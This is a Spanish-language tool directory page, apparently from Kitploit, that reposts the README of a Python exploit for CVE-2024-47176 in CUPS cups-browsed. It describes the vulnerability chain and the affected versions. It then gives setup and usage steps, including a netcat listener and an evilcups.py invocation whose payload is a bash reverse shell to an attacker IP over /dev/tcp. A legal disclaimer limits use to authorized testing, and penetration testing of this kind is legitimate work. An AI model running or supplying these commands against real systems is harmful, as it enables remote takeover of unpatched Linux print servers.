Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-47176 — Exploit en Python para CVE-2024-47176 que logra ejecución remota de comandos en CUPS cups-browsed mediante paquetes UDP manipulados. Incluye entrega de payload de shell inversa para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/gumerzzzindo/cve-2024-47176
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

Exploit en Python para CVE-2024-47176 que logra ejecución remota de comandos en CUPS cups-browsed mediante paquetes UDP manipulados. Incluye entrega de payload de shell inversa para pruebas de penetración autorizadas.

Ver Repositorio
19hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-47176 — Ejecución Remota de Comandos en CUPS

CVE CVSS Python Platform License

Únicamente para fines educativos y pruebas de penetración autorizadas.


Tabla de Contenidos

  • Descripción
  • Sistemas Afectados
  • CVEs Relacionados
  • Requisitos Previos
  • Configuración
  • Uso
  • Aviso Legal

Descripción

CUPS (Common UNIX Printing System) es un sistema de impresión de código abierto que gestiona impresoras en red. CVE-2024-47176 apunta al demonio cups-browsed, que se vincula a INADDR_ANY:631 y confía ciegamente en paquetes de cualquier origen.

Al crear un paquete UDP malicioso que desencadena una solicitud IPP Get-Printer-Attributes, un atacante puede hacer que cups-browsed se conecte a un servidor controlado por el atacante — y al combinarlo con las vulnerabilidades siguientes, lograr ejecución arbitraria de comandos remotos.


Sistemas Afectados

ComponenteCondición
cups-browsedEscuchando en UDP 631 (por defecto)
CUPS < 2.4.11Versiones sin parche
Sistemas Linux con CUPS expuestoPuerto 631 accesible desde el atacante

CVEs Relacionados

CVEDescripción
CVE-2024-47176cups-browsed confía en cualquier paquete UDP en el puerto 631
CVE-2024-47076libcupsfilters no sanitiza atributos IPP
CVE-2024-47175libppd inyecta datos no sanitizados en archivos PPD
CVE-2024-47177cups-filters permite ejecución de comandos a través de PPD

Requisitos Previos

  • Máquina objetivo con puerto 631 (IPP/UDP) expuesto
  • Python 3.x en tu máquina atacante
  • nmap (opcional, para reconocimiento)
  • Un listener netcat para la shell reversa

Configuración

1. Clona el repositorio:

git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. Instala la dependencia de Python requerida:

pip install ippserver

3. Inicia un listener en tu máquina:

nc -lvnp <PORT>

Uso

./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

Ejemplo — shell reversa:

./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

Después de ejecutar el exploit, activa un trabajo de impresión en el objetivo (o espera una verificación automática) para ejecutar el payload.


Aviso Legal

Este repositorio está destinado únicamente para fines educativos e investigación de seguridad autorizada. Usar esta herramienta contra sistemas que no poseas o para los que no tengas permiso explícito por escrito es ilegal y poco ético.

Descargar herramienta